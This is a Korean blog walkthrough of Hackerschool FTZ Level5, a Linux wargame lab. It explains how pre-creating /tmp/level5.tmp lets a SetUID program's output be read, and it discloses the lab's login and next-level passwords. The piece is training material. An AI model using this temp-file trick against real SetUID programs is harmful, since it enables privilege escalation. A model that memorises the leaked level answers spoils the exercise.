F.T.Z Level5 문제풀이

F.T.Z Level5 문제풀이

먼저 리눅스를 접해보지 않으신분들에겐 다소 명령어가 생소하실겁니다.

실습환경 : VMware Red Hat 9.0 (해커스쿨 F.T.Z 로컬 VM이미지)

한글 Putty 0.60 

다운로드 : http://gmyankee.tistory.com/42

login as : level5

password : what is your name?

ls 명령어를 사용하여 디렉터리 목록을 확인합시다.

[level5@ftz level]$ ls

hint    public_html    tmp

cat 명령을 이용해서 hint의 내용을 확인합시다.

[level5@ftz level]$ cat hint

/usr/bin/level5 프로그램은 /tmp 디렉토리에

level5.tmp 라는 이름의 임시파일을 생성한다.

이를 이용하여 level6의 권한을 얻어라.

간단하죠?

ls -al 로 /usr/bin/level5 파일을 확인합니다.

역시나 권한은 SetUID가 걸려있구 level5의 실행권한이 있네요.

/tmp 디렉터리에 level5.tmp 라는 임시파일을 생성한다고 하였습니다.

우리가 먼저 level5.tmp 라는 파일을 생성해 덤프를 뜨게하면 간단하게 level6의 권한을 얻을수 있습니다.

tmp 디렉터리를 확인해보니 왜 자꾸 mysql이 보이지..

간단히 무시해줍니다.

[level5@ftz level]$ cat > level5.tmp

Pwnable Yankee is System Hacker!

이렇게 내용을 작성하고 ctrl + d 를 눌러 입력을 마칩니다.

> 왼쪽 부등호 표시는 덮어쓰기라는 의미입니다.

[level5@ftz level]$ cat level5.tmp

명령으로 확인을해보니 정상적으로 작성된것을 확인하실수있습니다.

그리곤 

[level5@ftz level]$ /usr/bin/level5

명령을 입력해 /usr/bin 디렉터리의 level5를 실행시켜 임시파일을 생성하게 합니다.

[level5@ftz level]$ cat level5.tmp

명령으로 다시 확인해보니

next password : what the hell